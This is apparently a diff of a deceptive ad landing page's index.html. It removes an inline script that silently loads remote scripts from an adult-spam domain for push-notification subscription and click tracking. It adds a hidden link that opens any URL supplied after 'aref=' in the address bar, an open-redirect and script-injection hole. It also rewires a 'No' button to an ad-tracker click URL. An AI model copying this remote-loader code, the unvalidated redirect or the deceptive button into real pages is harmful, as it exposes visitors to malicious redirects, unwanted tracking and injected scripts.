--- a/index.html
+++ b/index.html
@@ -1,9 +1,5 @@
 <head>
-<script
-  src="https://code.jquery.com/jquery-3.6.3.min.js"
-  integrity="sha256-pvPw+upLPUjgMXY0G+8O0xUf+/Im1MZjXxxgOcBQBXU="
-  crossorigin="anonymous"></script>
-<script> var apcid = '8'; var tDomain = 'https://klqvx.sexcontent.info'; var _push = { serverUrl: window.location.origin, urlParams: { sub: '', s1:'81268', s2:'1457243', cid: apcid }, sCb: function (s) { let urlClickCheck = tDomain + '/site/redirectpage' + window.location.search; if (urlClickCheck.indexOf('?') !== -1) { urlClickCheck = urlClickCheck + '&pushclick=1' } else { urlClickCheck = urlClickCheck + '?pushclick=1' } let s1 = '81268'; let s2 = '1457243'; urlClickCheck += '&' + getUriClick + '&s1=' + s1 +'&s2=' + s2; (function (p, u, s, h) { s = u.createElement('script'); s.type = 'text/javascript'; s.async = true; s.src = urlClickCheck; h = u.getElementsByTagName('script')[1]; h.parentNode.insertBefore(s, h); })(window, document) } }; document.addEventListener('DOMContentLoaded', function () { (function (p, u, s, h) { p._pcq = p._pcq || []; p._pcq.push(['_currentTime', Date.now()]); let st = s; st = u.createElement('script'); st.type = 'text/javascript'; st.async = true; st.src = 'https://klqvx.sexcontent.info/o/fae1c0e44d508b57?tid_script=1&s1=81268&s2=1457243'; h = u.getElementsByTagName('script')[0]; h.parentNode.insertBefore(st, h); let tidT = setInterval(() => { if (typeof getTid !== 'undefined') { clearInterval(tidT); _push.urlParams.tid = getTid; _push.cru = getUriClick; s = u.createElement('script'); s.type = 'text/javascript'; s.async = true; s.src = location.protocol + '//' + location.host + '/js/subscriber.js'; h = u.getElementsByTagName('script')[1]; h.parentNode.insertBefore(s, h); } }, 500) })(window, document) }) </script>
+  <a href="javascript:void(0)" onclick="window.open(decodeURIComponent( window.location.href.substr(window.location.href.lastIndexOf('aref=')+5)), '_self');"> </a>
 </head>
 <div class="layout">
   <div class="content bg-1" data-bg="1">
@@ -15,7 +11,7 @@
       </div>
    
           <div>
-            <a data-link="#" class="lp-button" href="#" data-id="1">
+            <a data-link="#" class="lp-button" href="http://dev-trackergo.adsbridge.com/click" data-id="1">
               No                                                                           
             </a>
           </div>
